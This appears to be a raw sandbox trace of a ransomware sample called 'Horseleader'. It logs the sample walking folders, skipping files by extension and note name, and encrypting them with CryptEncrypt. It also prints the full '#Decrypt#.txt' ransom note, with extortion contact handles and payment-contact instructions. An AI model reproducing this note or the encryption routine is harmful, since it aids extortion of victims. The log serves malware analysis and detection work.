[0251.559] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.559] lstrlenW (lpString=".testttjffg") returned 11 [0251.560] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.560] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.560] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.560] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.560] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb6b05f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb6b05f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf2f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="title_stripe.png", cAlternateFileName="")) returned 1 [0251.560] lstrcmpiW (lpString1="title_stripe.png", lpString2="Windows") returned -1 [0251.560] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png") returned 73 [0251.560] StrStrIW (lpFirst="title_stripe.png", lpSrch=".horseleader") returned 0x0 [0251.560] lstrcmpW (lpString1="title_stripe.png", lpString2="#Decrypt#.txt") returned 1 [0251.560] lstrcmpW (lpString1="title_stripe.png", lpString2="_uninstalling_.png") returned 1 [0251.560] lstrlenW (lpString=".testttjffg") returned 11 [0251.561] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png", lpSrch=".testttjffg") returned 0x0 [0251.561] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.561] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.561] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\title_stripe.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.561] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb6b05f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb6b05f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf2f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="title_stripe.png", cAlternateFileName="")) returned 0 [0251.561] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.562] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\#Decrypt#.txt") returned 70 [0251.562] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.564] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.564] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.565] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.565] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.566] CloseHandle (hObject=0x158) returned 1 [0251.566] GetProcessHeap () returned 0x780000 [0251.566] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.566] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa19a729d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a3fc59, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="LayeredTitles", cAlternateFileName="LAYERE~1")) returned 1 [0251.566] lstrcmpiW (lpString1="LayeredTitles", lpString2="Windows") returned -1 [0251.566] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned 61 [0251.566] lstrcmpW (lpString1="LayeredTitles", lpString2=".") returned 1 [0251.566] lstrcmpW (lpString1="LayeredTitles", lpString2="..") returned 1 [0251.566] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.566] GetProcessHeap () returned 0x780000 [0251.566] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.567] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\*") returned 63 [0251.567] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa19a729d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a3fc59, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.569] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.569] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\.") returned 63 [0251.569] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.569] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa19a729d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a3fc59, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.569] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.569] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\..") returned 64 [0251.569] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.569] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.569] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70bee7b2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70bee7b2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.570] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.570] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png") returned 79 [0251.570] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.570] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.570] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.570] lstrlenW (lpString=".testttjffg") returned 11 [0251.570] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.570] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.570] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.570] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.571] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70c60bc9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70c60bc9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="203x8subpicture.png", cAlternateFileName="")) returned 1 [0251.571] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="Windows") returned -1 [0251.572] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 81 [0251.572] StrStrIW (lpFirst="203x8subpicture.png", lpSrch=".horseleader") returned 0x0 [0251.572] lstrcmpW (lpString1="203x8subpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.572] lstrcmpW (lpString1="203x8subpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.572] lstrlenW (lpString=".testttjffg") returned 11 [0251.572] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.572] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.572] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.572] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.573] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70c1490f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70c1490f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x191f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="blackbars60.png", cAlternateFileName="")) returned 1 [0251.573] lstrcmpiW (lpString1="blackbars60.png", lpString2="Windows") returned -1 [0251.573] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png") returned 77 [0251.573] StrStrIW (lpFirst="blackbars60.png", lpSrch=".horseleader") returned 0x0 [0251.573] lstrcmpW (lpString1="blackbars60.png", lpString2="#Decrypt#.txt") returned 1 [0251.574] lstrcmpW (lpString1="blackbars60.png", lpString2="_uninstalling_.png") returned 1 [0251.574] lstrlenW (lpString=".testttjffg") returned 11 [0251.574] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png", lpSrch=".testttjffg") returned 0x0 [0251.574] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.574] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.574] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\blackbars60.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.574] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70abdcca, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70abdcca, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5fed, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="layers.png", cAlternateFileName="")) returned 1 [0251.574] lstrcmpiW (lpString1="layers.png", lpString2="Windows") returned -1 [0251.574] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png") returned 72 [0251.575] StrStrIW (lpFirst="layers.png", lpSrch=".horseleader") returned 0x0 [0251.575] lstrcmpW (lpString1="layers.png", lpString2="#Decrypt#.txt") returned 1 [0251.575] lstrcmpW (lpString1="layers.png", lpString2="_uninstalling_.png") returned 1 [0251.575] lstrlenW (lpString=".testttjffg") returned 11 [0251.575] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png", lpSrch=".testttjffg") returned 0x0 [0251.575] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.575] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.575] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\layers.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.575] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ba24f8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70ba24f8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.575] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.575] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png") returned 94 [0251.576] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.576] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.576] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.576] lstrlenW (lpString=".testttjffg") returned 11 [0251.576] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.576] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.576] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.577] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.577] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70b5623e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70b5623e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.577] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.578] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png") returned 100 [0251.578] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.578] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.578] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.578] lstrlenW (lpString=".testttjffg") returned 11 [0251.578] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.578] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.578] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.578] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.579] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ba24f8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70ba24f8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.579] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.579] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png") returned 95 [0251.579] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.579] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.579] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.579] lstrlenW (lpString=".testttjffg") returned 11 [0251.579] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.579] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) 